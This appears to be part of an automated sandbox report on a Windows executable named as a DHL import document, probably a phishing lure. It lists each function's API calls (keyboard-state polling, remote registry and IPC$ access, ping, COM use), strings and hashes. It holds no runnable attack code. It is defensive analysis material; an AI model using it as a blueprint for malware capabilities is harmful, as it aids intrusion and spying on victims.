ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,004F8BBA,00000000,?), ref: 005369B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,004F8BBA,00000000), ref: 005369D4
DeleteObject.GDI32(00000000), ref: 005369E6

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 7cf3d4e631f582c101e35b004a4dcb7b4d22a3c7c2324be1037e8fa65381a413
Instruction ID: 89593a7c84c8f3eeb1fcd1f4f089364ab2409b80f9b76c3ec1b6e6267cb655cc
Opcode Fuzzy Hash: 7cf3d4e631f582c101e35b004a4dcb7b4d22a3c7c2324be1037e8fa65381a413
Instruction Fuzzy Hash: 0361DD31002A48EFDB618F14D958B3A7BF1FB60312F10851EE1429F660CB39B995EF99

Function 004F9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 004F9944: GetWindowLongW.USER32(?,000000EB), ref: 004F9952

GetSysColor.USER32(0000000F), ref: 004F9862

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: d6724e121e2ffefdd604dd20797459dfb4d8743ea8136d974fda203eb0967f6a
Instruction ID: 2dde5f06e51d57b01b8c4ceb93dc4133d48ebfa5105154d0f5c905705ea3cc64
Opcode Fuzzy Hash: d6724e121e2ffefdd604dd20797459dfb4d8743ea8136d974fda203eb0967f6a
Instruction Fuzzy Hash: 7C412A31500608AFDB306F389C84BBA3F65FB16370F14461AFAA6872E1C3359C86EB15

Function 00518D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Strings

.P, xrefs: 0051903A, 00518FD0, 00518FF2

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID:
String ID: .P
API String ID: 0-3268218682
Opcode ID: 2cc9fe785c86e4737a7350c40e095d76b9e05565f7fed9c2cd8566431630ca08
Instruction ID: 5ea44014c38bfc0b51b1d32da0a76f01324a4356145ea64899659694166b19f1
Opcode Fuzzy Hash: 2cc9fe785c86e4737a7350c40e095d76b9e05565f7fed9c2cd8566431630ca08
Instruction Fuzzy Hash: AAC1C474A0424AAFEB21DFA8D859BFDBFB4BF5D310F184199E414A72D2C7309981CB61

Function 005496E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0052F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00549717
LoadStringW.USER32(00000000,?,0052F7F8,00000001), ref: 00549720

Part of subcall function 004E9CB3: _wcslen.LIBCMT ref: 004E9CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0052F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00549742
LoadStringW.USER32(00000000,?,0052F7F8,00000001), ref: 00549745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00549866

Strings

^ ERROR, xrefs: 005497FB
Error: , xrefs: 0054981D
Line %d:, xrefs: 005497A0
Line %d (File "%s"):, xrefs: 0054978F
%s (%d) : ==> %s: %s %s, xrefs: 0054984A

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: a38ab7f3a7761af0fe4fc918e7b9153362b489e6c7ca9226d5d1c3f5efffa5f3
Instruction ID: df4f5320c1cdaaf9ecd8dddb355c617fa972aecb874b70f65b72c0cc58f658be
Opcode Fuzzy Hash: a38ab7f3a7761af0fe4fc918e7b9153362b489e6c7ca9226d5d1c3f5efffa5f3
Instruction Fuzzy Hash: CD418072800149AACF05FBE2DD87DEE7B78BF55349F60046AB50572092EB386F48CB65

Function 005406DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 004E6B57: _wcslen.LIBCMT ref: 004E6B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 005407A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005407BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005407DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00540804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0054082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00540837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0054083C

Strings

SOFTWARE\Classes\, xrefs: 0054070E
\IPC$, xrefs: 00540784
\CLSID, xrefs: 00540724

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 57cb242f529637e213d91fe2262e828472dfa04778d0b9fcbe054c1c1408c42a
Instruction ID: de98ae9d697b9c1b9bdd00d0217ef4f0cd346729a49303e204c4b7e13dd6e8b8
Opcode Fuzzy Hash: 57cb242f529637e213d91fe2262e828472dfa04778d0b9fcbe054c1c1408c42a
Instruction Fuzzy Hash: 9F414972C10228ABCF11EFA1DC85CEDBB78FF54355F14456AE901A31A1EB34AE44CBA0

Function 00563C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00563C5C
CoInitialize.OLE32(00000000), ref: 00563C8A
CoUninitialize.OLE32 ref: 00563C94
_wcslen.LIBCMT ref: 00563D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00563DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00563ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00563F0E
CoGetObject.OLE32(?,00000000,0057FB98,?), ref: 00563F2D
SetErrorMode.KERNEL32(00000000), ref: 00563F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00563FC4
VariantClear.OLEAUT32(?), ref: 00563FD8

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 3213d44186a0530a6ac8b7dc19766fe3952a223bd065b5bcacbc9f09b72d9278
Instruction ID: aa9fe846df1e53abe08487e3a49acaa211412b932cc72286e63e5ef0e06c6f19
Opcode Fuzzy Hash: 3213d44186a0530a6ac8b7dc19766fe3952a223bd065b5bcacbc9f09b72d9278
Instruction Fuzzy Hash: 8AC14471608301AFD700DF69C88492BBBE9FF89748F14492DF98A9B251DB31EE45CB52

Function 00557A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00557AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00557B8F
SHGetDesktopFolder.SHELL32(?), ref: 00557BA3
CoCreateInstance.OLE32(0057FD08,00000000,00000001,005A6E6C,?), ref: 00557BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00557C74
CoTaskMemFree.OLE32(?,?), ref: 00557CCC
SHBrowseForFolderW.SHELL32(?), ref: 00557D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00557D7A
CoTaskMemFree.OLE32(00000000), ref: 00557D81
CoTaskMemFree.OLE32(00000000), ref: 00557DD6
CoUninitialize.OLE32 ref: 00557DDC

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: ade2b1c99f180ce9e843a42ee11581cc376d8f37186eebbda8cd222d96b8d7a1
Instruction ID: b81aa8d21f9a6fd859fff7516d9f522e4ec6436b48c305755baf3ef6f79ed715
Opcode Fuzzy Hash: ade2b1c99f180ce9e843a42ee11581cc376d8f37186eebbda8cd222d96b8d7a1
Instruction Fuzzy Hash: DDC15B74A00109AFCB14DFA5D898DAEBBF9FF48315B148499E81ADB361D730EE45CB90

Function 0057541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00575504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00575515
CharNextW.USER32(00000158), ref: 00575544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00575585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0057559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005755AC

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: a62cb1f0c6226699500bb4a5fcc24ce8b110b6c21fbe564cb04dc1ae7afde684
Instruction ID: e7c572a51b4b601bcfd664d9fdb07b32312d5e5bf5274e3eff23cc2350bb64b8
Opcode Fuzzy Hash: a62cb1f0c6226699500bb4a5fcc24ce8b110b6c21fbe564cb04dc1ae7afde684
Instruction Fuzzy Hash: 70618130900609AFDF118F54EC88DFE7F79FB15760F108549F629AA290E7B49A84FB60

Function 0053FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0053FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0053FB08
VariantInit.OLEAUT32(?), ref: 0053FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0053FB3A
VariantCopy.OLEAUT32(?,?), ref: 0053FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0053FBA1
VariantClear.OLEAUT32(?), ref: 0053FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0053FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0053FBCC
VariantClear.OLEAUT32(?), ref: 0053FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0053FBE9

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 75421a3eea0480520db7194422bacd337684f09919777ef7709cb537be74ad70
Instruction ID: c048b0364582a80dbeaab28b70c6e8187b11b6d04586ccb41d476b2371c2b4dc
Opcode Fuzzy Hash: 75421a3eea0480520db7194422bacd337684f09919777ef7709cb537be74ad70
Instruction Fuzzy Hash: F8417075E00219AFCF00DF64D8689AEBFB9FF58345F008069E949A7261DB34A945DFA0

Function 00549C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00549CA1
GetAsyncKeyState.USER32(000000A0), ref: 00549D22
GetKeyState.USER32(000000A0), ref: 00549D3D
GetAsyncKeyState.USER32(000000A1), ref: 00549D57
GetKeyState.USER32(000000A1), ref: 00549D6C
GetAsyncKeyState.USER32(00000011), ref: 00549D84
GetKeyState.USER32(00000011), ref: 00549D96
GetAsyncKeyState.USER32(00000012), ref: 00549DAE
GetKeyState.USER32(00000012), ref: 00549DC0
GetAsyncKeyState.USER32(0000005B), ref: 00549DD8
GetKeyState.USER32(0000005B), ref: 00549DEA

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 868d531b421ce925138b888d59e77b6568cad2993c8521a096762f38083a3766
Instruction ID: fece2af719972fe216686e47d4525629523132260b56dd887e34f378f8e71729
Opcode Fuzzy Hash: 868d531b421ce925138b888d59e77b6568cad2993c8521a096762f38083a3766
Instruction Fuzzy Hash: 8741D6749047C96EFF308A6488467F7BEA07F2134CF08805EDAC6565C2DBA59DC8D7A2

Function 0056055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 005605BC
inet_addr.WSOCK32(?), ref: 0056061C
gethostbyname.WSOCK32(?), ref: 00560628
IcmpCreateFile.IPHLPAPI ref: 00560636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 005606C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 005606E5
IcmpCloseHandle.IPHLPAPI(?), ref: 005607B9
WSACleanup.WSOCK32 ref: 005607BF

Strings

Ping, xrefs: 00560676

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 4a9b771928bc0d3f9509c1f8c27133521107b4a736672e1113eb434293b7a6b3
Instruction ID: 75233ec5943dabde75e4f3c6d203db3ad72fccc8ee5df4271facc8c1161404f7
Opcode Fuzzy Hash: 4a9b771928bc0d3f9509c1f8c27133521107b4a736672e1113eb434293b7a6b3
Instruction Fuzzy Hash: 44916A75604241AFD720DF16D888B1ABFE0FF44318F1499ADE46A8B6A2C734ED85CF91

Function 00568CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00568CF3

Part of subcall function 00548E54: _wcslen.LIBCMT ref: 00548E77

_wcslen.LIBCMT ref: 00568D4E
_wcslen.LIBCMT ref: 00568D9C
_wcslen.LIBCMT ref: 00568DDC
_wcslen.LIBCMT ref: 00568E6E

Strings

none, xrefs: 00568E65, 00568E6A
winapi, xrefs: 00568D96, 00568D9B
cdecl, xrefs: 00568D48, 00568D4D
stdcall, xrefs: 00568DD6, 00568DDB

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: fe3a9b5e3f9a3a77ff2aa49a738df98739f8b9596970519e009691ce097492c2
Instruction ID: e655eac65363b11b22bdb406453518517a24e7d78a0f84903c1a3155e227cd4a
Opcode Fuzzy Hash: fe3a9b5e3f9a3a77ff2aa49a738df98739f8b9596970519e009691ce097492c2
Instruction Fuzzy Hash: 4551BF72A001169BCF24DF68C9509BEBBB9BF64324B244729E926E72C4DF35DD40C7A0

Function 0056372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00563774
CoUninitialize.OLE32 ref: 0056377F
CoCreateInstance.OLE32(?,00000000,00000017,0057FB78,?), ref: 005637D9
IIDFromString.OLE32(?,?), ref: 0056384C
VariantInit.OLEAUT32(?), ref: 005638E4
VariantClear.OLEAUT32(?), ref: 00563936

Strings

Invalid parameter, xrefs: 00563865
Failed to create object, xrefs: 005637E4, 0056389A
NULL Pointer assignment, xrefs: 0056381E

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 2937884d464014256134446da742c778c5df363745928dfbd84b639c787f8b5b
Instruction ID: 437a8232bda60d66fa5ae23839000f66526ae1dd2c38f5a3544955a71e567770
Opcode Fuzzy Hash: 2937884d464014256134446da742c778c5df363745928dfbd84b639c787f8b5b
Instruction Fuzzy Hash: 16617770608201AFD310DF55D889AAABFE8FF89715F10080EF9859B291D770EE48DB96

Function 00553388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 005533CF

Part of subcall function 004E9CB3: _wcslen.LIBCMT ref: 004E9CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 005533F0

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00553504
Error: , xrefs: 005534D1
Incorrect parameters to object property !, xrefs: 005534AB
^ ERROR , xrefs: 0055349E
Line %d (File "%s"):, xrefs: 00553443, 0055345C
"%s" (%d) : ==> %s:, xrefs: 00553522

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: bf81d3dbf9b3be86ad6c57dce677bd8292e4439d61825c54150b7deb2a1618f6
Instruction ID: 7c24e061a4e67efef14f8e85c141d066f678f86fa27cd6638b6ea182abd3e6bc
Opcode Fuzzy Hash: bf81d3dbf9b3be86ad6c57dce677bd8292e4439d61825c54150b7deb2a1618f6
Instruction Fuzzy Hash: 5751E331800149AACF15EBE2CD56EEEBBB8FF14346F24456AF405720A1EB352F58DB64

Function 0054B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0054B5FC
_wcslen.LIBCMT ref: 0054B608
_wcslen.LIBCMT ref: 0054B64D
_wcslen.LIBCMT ref: 0054B68C
_wcslen.LIBCMT ref: 0054B6C7

Strings

KEYS, xrefs: 0054B647, 0054B64C
APPEND, xrefs: 0054B6C1, 0054B6C6
REMOVE, xrefs: 0054B602, 0054B607
EXISTS, xrefs: 0054B686, 0054B68B

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 119710ef94eef7f3773e8f2405569845039bbe28068483a8c0f5e6c96a30cf43
Instruction ID: 09509c9a5398d682d21023e0b19af9c27d8c7ed9e07a978a7a3a85b2bc6ac84f
Opcode Fuzzy Hash: 119710ef94eef7f3773e8f2405569845039bbe28068483a8c0f5e6c96a30cf43
Instruction Fuzzy Hash: FB41C532A010279ADB209F7D88905FE7FA5FBA179CB264629E921D7284E731CD81C790

Function 00555393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 005553A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00555416
GetLastError.KERNEL32 ref: 00555420
SetErrorMode.KERNEL32(00000000,READY), ref: 005554A7

Strings

READONLY, xrefs: 00555452
NOTREADY, xrefs: 0055544B
READY, xrefs: 00555460, 00555468
INVALID, xrefs: 00555459
UNKNOWN, xrefs: 00555444

